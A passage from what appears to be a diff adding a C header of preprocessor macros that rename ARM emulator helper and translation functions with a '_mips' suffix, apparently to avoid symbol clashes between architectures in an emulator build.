gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mips +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mips +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mips +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mips +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mips +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mips +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mips +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mips +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mips +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mips +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mips +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mips +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mips +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mips +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mips +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mips +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mips +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mips +#define gen_helper_neon_tbl gen_helper_neon_tbl_mips +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mips +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mips +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mips +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mips +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mips +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mips +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mips +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mips +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mips +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mips +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mips +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mips +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mips +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mips +#define gen_helper_pre_hvc gen_helper_pre_hvc_mips +#define gen_helper_pre_smc gen_helper_pre_smc_mips +#define gen_helper_qadd16 gen_helper_qadd16_mips +#define gen_helper_qadd8 gen_helper_qadd8_mips +#define gen_helper_qaddsubx gen_helper_qaddsubx_mips +#define gen_helper_qsub16 gen_helper_qsub16_mips +#define gen_helper_qsub8 gen_helper_qsub8_mips +#define gen_helper_qsubaddx gen_helper_qsubaddx_mips +#define gen_helper_rbit gen_helper_rbit_mips +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mips +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mips +#define gen_helper_recps_f32 gen_helper_recps_f32_mips +#define gen_helper_rintd gen_helper_rintd_mips +#define gen_helper_rintd_exact gen_helper_rintd_exact_mips +#define gen_helper_rints gen_helper_rints_mips +#define gen_helper_rints_exact gen_helper_rints_exact_mips +#define gen_helper_ror_cc gen_helper_ror_cc_mips +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mips +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_mips +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mips +#define gen_helper_sadd16 gen_helper_sadd16_mips +#define gen_helper_sadd8 gen_helper_sadd8_mips +#define gen_helper_saddsubx gen_helper_saddsubx_mips +#define gen_helper_sar_cc gen_helper_sar_cc_mips +#define gen_helper_sdiv gen_helper_sdiv_mips +#define gen_helper_sel_flags gen_helper_sel_flags_mips +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mips +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mips +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mips +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mips +#define gen_helper_set_rmode gen_helper_set_rmode_mips +#define gen_helper_set_user_reg gen_helper_set_user_reg_mips +#define gen_helper_shadd16 gen_helper_shadd16_mips +#define gen_helper_shadd8 gen_helper_shadd8_mips +#define gen_helper_shaddsubx gen_helper_shaddsubx_mips +#define gen_helper_shl_cc gen_helper_shl_cc_mips +#define gen_helper_shr_cc gen_helper_shr_cc_mips +#define gen_helper_shsub16 gen_helper_shsub16_mips +#define gen_helper_shsub8 gen_helper_shsub8_mips +#define gen_helper_shsubaddx gen_helper_shsubaddx_mips +#define gen_helper_ssat gen_helper_ssat_mips +#define gen_helper_ssat16 gen_helper_ssat16_mips +#define gen_helper_ssub16 gen_helper_ssub16_mips +#define gen_helper_ssub8 gen_helper_ssub8_mips +#define gen_helper_ssubaddx gen_helper_ssubaddx_mips +#define gen_helper_sub_saturate gen_helper_sub_saturate_mips +#define gen_helper_sxtb16 gen_helper_sxtb16_mips +#define gen_helper_uadd16 gen_helper_uadd16_mips +#define gen_helper_uadd8 gen_helper_uadd8_mips +#define gen_helper_uaddsubx gen_helper_uaddsubx_mips +#define gen_helper_udiv gen_helper_udiv_mips +#define gen_helper_uhadd16 gen_helper_uhadd16_mips +#define gen_helper_uhadd8 gen_helper_uhadd8_mips +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mips +#define gen_helper_uhsub16 gen_helper_uhsub16_mips +#define gen_helper_uhsub8 gen_helper_uhsub8_mips +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mips +#define gen_helper_uqadd16 gen_helper_uqadd16_mips +#define gen_helper_uqadd8 gen_helper_uqadd8_mips +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mips +#define gen_helper_uqsub16 gen_helper_uqsub16_mips +#define gen_helper_uqsub8 gen_helper_uqsub8_mips +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mips +#define gen_helper_usad8 gen_helper_usad8_mips +#define gen_helper_usat gen_helper_usat_mips +#define gen_helper_usat16 gen_helper_usat16_mips +#define gen_helper_usub16 gen_helper_usub16_mips +#define gen_helper_usub8 gen_helper_usub8_mips +#define gen_helper_usubaddx gen_helper_usubaddx_mips +#define gen_helper_uxtb16 gen_helper_uxtb16_mips +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mips +#define gen_helper_v7m_msr gen_helper_v7m_msr_mips +#define gen_helper_vfp_absd gen_helper_vfp_absd_mips +#define gen_helper_vfp_abss gen_helper_vfp_abss_mips +#define gen_helper_vfp_addd gen_helper_vfp_addd_mips +#define gen_helper_vfp_adds gen_helper_vfp_adds_mips +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mips +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mips +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mips +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mips +#define gen_helper_vfp_divd gen_helper_vfp_divd_mips +#define gen_helper_vfp_divs gen_helper_vfp_divs_mips +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mips +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mips +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mips +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mips +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mips +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mips +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mips +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mips +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mips +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mips +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mips +#define gen_helper_vfp_mins gen_helper_vfp_mins_mips +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mips +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mips +#define gen_helper_vfp_muld gen_helper_vfp_muld_mips +#define gen_helper_vfp_muls gen_helper_vfp_muls_mips +#define gen_helper_vfp_negd gen_helper_vfp_negd_mips +#define gen_helper_vfp_negs gen_helper_vfp_negs_mips +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mips +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mips +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mips +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mips +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mips +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mips +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mips +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mips +#define gen_helper_vfp_subd gen_helper_vfp_subd_mips +#define gen_helper_vfp_subs gen_helper_vfp_subs_mips +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mips +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mips +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mips +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mips +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mips +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mips +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mips +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mips +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mips +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mips +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mips +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mips +#define gen_helper_vfp_touid gen_helper_vfp_touid_mips +#define gen_helper_vfp_touis gen_helper_vfp_touis_mips +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mips +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mips +#define gen_helper_vfp_tould gen_helper_vfp_tould_mips +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mips +#define gen_helper_vfp_touls gen_helper_vfp_touls_mips +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mips +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mips +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mips +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mips +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mips +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mips +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mips +#define gen_helper_wfe gen_helper_wfe_mips +#define gen_helper_wfi gen_helper_wfi_mips +#define gen_hvc gen_hvc_mips +#define gen_intermediate_code_internal gen_intermediate_code_internal_mips +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mips +#define gen_iwmmxt_address gen_iwmmxt_address_mips +#define gen_iwmmxt_shift gen_iwmmxt_shift_mips +#define gen_jmp gen_jmp_mips +#define gen_load_and_replicate gen_load_and_replicate_mips +#define gen_load_exclusive gen_load_exclusive_mips +#define gen_logic_CC gen_logic_CC_mips +#define gen_logicq_cc gen_logicq_cc_mips +#define gen_lookup_tb gen_lookup_tb_mips +#define gen_mov_F0_vreg gen_mov_F0_vreg_mips +#define gen_mov_F1_vreg gen_mov_F1_vreg_mips +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mips +#define gen_muls_i64_i32 gen_muls_i64_i32_mips +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mips +#define gen_mulxy gen_mulxy_mips +#define gen_neon_add gen_neon_add_mips +#define gen_neon_addl gen_neon_addl_mips +#define gen_neon_addl_saturate gen_neon_addl_saturate_mips +#define gen_neon_bsl gen_neon_bsl_mips +#define gen_neon_dup_high16 gen_neon_dup_high16_mips +#define gen_neon_dup_low16 gen_neon_dup_low16_mips +#define gen_neon_dup_u8 gen_neon_dup_u8_mips +#define gen_neon_mull gen_neon_mull_mips +#define gen_neon_narrow gen_neon_narrow_mips +#define gen_neon_narrow_op gen_neon_narrow_op_mips +#define gen_neon_narrow_sats gen_neon_narrow_sats_mips +#define gen_neon_narrow_satu gen_neon_narrow_satu_mips +#define gen_neon_negl gen_neon_negl_mips +#define gen_neon_rsb gen_neon_rsb_mips +#define gen_neon_shift_narrow gen_neon_shift_narrow_mips +#define gen_neon_subl gen_neon_subl_mips +#define gen_neon_trn_u16 gen_neon_trn_u16_mips +#define gen_neon_trn_u8 gen_neon_trn_u8_mips +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mips +#define gen_neon_unzip gen_neon_unzip_mips +#define gen_neon_widen gen_neon_widen_mips +#define gen_neon_zip gen_neon_zip_mips +#define gen_new_label gen_new_label_mips +#define gen_nop_hint gen_nop_hint_mips +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mips +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mips +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mips +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mips +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mips +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mips +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mips +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mips +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mips +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mips +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mips +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mips +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mips +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mips +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mips +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mips +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mips +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mips +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mips +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mips +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mips +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mips +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mips +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mips +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mips +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mips +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mips +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mips +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mips +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mips +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mips +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mips +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mips +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mips +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mips +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mips +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mips +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mips +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mips +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mips +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mips +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mips +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mips +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mips +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mips +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mips +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mips +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mips +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mips +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mips +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mips +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mips +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mips +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mips +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mips +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mips +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mips +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mips +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mips +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mips +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mips +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mips +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mips +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mips +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mips +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mips +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mips +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mips +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mips +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mips +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mips +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mips +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mips +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mips +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mips +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mips +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mips +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mips +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mips +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mips +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mips +#define gen_rev16 gen_rev16_mips +#define gen_revsh gen_revsh_mips +#define gen_rfe gen_rfe_mips +#define gen_sar gen_sar_mips +#define gen_sbc_CC gen_sbc_CC_mips +#define gen_sbfx gen_sbfx_mips +#define gen_set_CF_bit31 gen_set_CF_bit31_mips +#define gen_set_condexec gen_set_condexec_mips +#define gen_set_cpsr gen_set_cpsr_mips +#define gen_set_label gen_set_label_mips +#define gen_set_pc_im gen_set_pc_im_mips +#define gen_set_psr gen_set_psr_mips +#define gen_set_psr_im gen_set_psr_im_mips +#define gen_shl gen_shl_mips +#define gen_shr gen_shr_mips +#define gen_smc gen_smc_mips +#define gen_smul_dual gen_smul_dual_mips +#define gen_srs gen_srs_mips +#define gen_ss_advance gen_ss_advance_mips +#define gen_step_complete_exception gen_step_complete_exception_mips +#define gen_store_exclusive gen_store_exclusive_mips +#define gen_storeq_reg gen_storeq_reg_mips +#define gen_sub_carry gen_sub_carry_mips +#define gen_sub_CC gen_sub_CC_mips +#define gen_subq_msw gen_subq_msw_mips +#define gen_swap_half gen_swap_half_mips +#define gen_thumb2_data_op gen_thumb2_data_op_mips +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mips +#define gen_ubfx gen_ubfx_mips +#define gen_vfp_abs gen_vfp_abs_mips +#define gen_vfp_add gen_vfp_add_mips +#define gen_vfp_cmp gen_vfp_cmp_mips +#define gen_vfp_cmpe gen_vfp_cmpe_mips +#define gen_vfp_div gen_vfp_div_mips +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mips +#define gen_vfp_F1_mul gen_vfp_F1_mul_mips +#define gen_vfp_F1_neg gen_vfp_F1_neg_mips +#define gen_vfp_ld gen_vfp_ld_mips +#define gen_vfp_mrs gen_vfp_mrs_mips +#define gen_vfp_msr gen_vfp_msr_mips +#define gen_vfp_mul gen_vfp_mul_mips +#define gen_vfp_neg gen_vfp_neg_mips +#define gen_vfp_shto gen_vfp_shto_mips +#define gen_vfp_sito gen_vfp_sito_mips +#define gen_vfp_slto gen_vfp_slto_mips +#define gen_vfp_sqrt gen_vfp_sqrt_mips +#define gen_vfp_st gen_vfp_st_mips +#define gen_vfp_sub gen_vfp_sub_mips +#define gen_vfp_tosh gen_vfp_tosh_mips +#define gen_vfp_tosi gen_vfp_tosi_mips +#define gen_vfp_tosiz gen_vfp_tosiz_mips +#define gen_vfp_tosl gen_vfp_tosl_mips +#define gen_vfp_touh gen_vfp_touh_mips +#define gen_vfp_toui gen_vfp_toui_mips +#define gen_vfp_touiz gen_vfp_touiz_mips +#define gen_vfp_toul gen_vfp_toul_mips +#define gen_vfp_uhto gen_vfp_uhto_mips +#define gen_vfp_uito gen_vfp_uito_mips +#define gen_vfp_ulto gen_vfp_ulto_mips +#define get_arm_cp_reginfo get_arm_cp_reginfo_mips +#define get_clock get_clock_mips +#define get_clock_realtime get_clock_realtime_mips +#define get_constraint_priority get_constraint_priority_mips +#define get_float_exception_flags get_float_exception_flags_mips +#define get_float_rounding_mode get_float_rounding_mode_mips +#define get_fpstatus_ptr get_fpstatus_ptr_mips +#define get_level1_table_address get_level1_table_address_mips +#define get_mem_index get_mem_index_mips +#define get_next_param_value get_next_param_value_mips +#define get_opt_name get_opt_name_mips +#define get_opt_value get_opt_value_mips +#define get_page_addr_code get_page_addr_code_mips +#define get_param_value get_param_value_mips +#define get_phys_addr get_phys_addr_mips +#define get_phys_addr_lpae get_phys_addr_lpae_mips +#define get_phys_addr_mpu get_phys_addr_mpu_mips +#define get_phys_addr_v5 get_phys_addr_v5_mips +#define get_phys_addr_v6 get_phys_addr_v6_mips +#define get_system_memory get_system_memory_mips +#define get_ticks_per_sec get_ticks_per_sec_mips +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mips +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mips +#define gt_cntfrq_access gt_cntfrq_access_mips +#define gt_cnt_read gt_cnt_read_mips +#define gt_cnt_reset gt_cnt_reset_mips +#define gt_counter_access gt_counter_access_mips +#define gt_ctl_write gt_ctl_write_mips +#define gt_cval_write gt_cval_write_mips +#define gt_get_countervalue gt_get_countervalue_mips +#define gt_pct_access gt_pct_access_mips +#define gt_ptimer_access gt_ptimer_access_mips +#define gt_recalc_timer gt_recalc_timer_mips +#define gt_timer_access gt_timer_access_mips +#define gt_tval_read gt_tval_read_mips +#define gt_tval_write gt_tval_write_mips +#define gt_vct_access gt_vct_access_mips +#define gt_vtimer_access gt_vtimer_access_mips +#define guest_phys_blocks_free guest_phys_blocks_free_mips +#define guest_phys_blocks_init guest_phys_blocks_init_mips +#define handle_vcvt handle_vcvt_mips +#define handle_vminmaxnm handle_vminmaxnm_mips +#define handle_vrint handle_vrint_mips +#define handle_vsel handle_vsel_mips +#define has_help_option has_help_option_mips +#define have_bmi1 have_bmi1_mips +#define have_bmi2 have_bmi2_mips +#define hcr_write hcr_write_mips +#define helper_access_check_cp_reg helper_access_check_cp_reg_mips +#define helper_add_saturate helper_add_saturate_mips +#define helper_add_setq helper_add_setq_mips +#define helper_add_usaturate helper_add_usaturate_mips +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mips +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mips +#define helper_be_ldq_mmu helper_be_ldq_mmu_mips +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips +#define helper_be_ldul_mmu helper_be_ldul_mmu_mips +#define helper_be_lduw_mmu helper_be_lduw_mmu_mips +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mips +#define helper_be_stl_mmu helper_be_stl_mmu_mips +#define helper_be_stq_mmu helper_be_stq_mmu_mips +#define helper_be_stw_mmu helper_be_stw_mmu_mips +#define helper_clear_pstate_ss helper_clear_pstate_ss_mips +#define helper_clz_arm helper_clz_arm_mips +#define helper_cpsr_read helper_cpsr_read_mips +#define helper_cpsr_write helper_cpsr_write_mips +#define helper_crc32_arm helper_crc32_arm_mips +#define helper_crc32c helper_crc32c_mips +#define helper_crypto_aese helper_crypto_aese_mips +#define helper_crypto_aesmc helper_crypto_aesmc_mips +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mips +#define helper_crypto_sha1h helper_crypto_sha1h_mips +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mips +#define helper_crypto_sha256h helper_crypto_sha256h_mips +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mips +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mips +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mips +#define helper_dc_zva helper_dc_zva_mips +#define helper_double_saturate helper_double_saturate_mips +#define helper_exception_internal helper_exception_internal_mips +#define helper_exception_return helper_exception_return_mips +#define helper_exception_with_syndrome helper_exception_with_syndrome_mips +#define helper_get_cp_reg helper_get_cp_reg_mips +#define helper_get_cp_reg64 helper_get_cp_reg64_mips +#define helper_get_r13_banked helper_get_r13_banked_mips +#define helper_get_user_reg helper_get_user_reg_mips +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mips +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mips +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mips +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mips +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mips +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mips +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mips +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mips +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mips +#define helper_iwmmxt_addub helper_iwmmxt_addub_mips +#define helper_iwmmxt_addul helper_iwmmxt_addul_mips +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mips +#define helper_iwmmxt_align helper_iwmmxt_align_mips +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mips +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mips 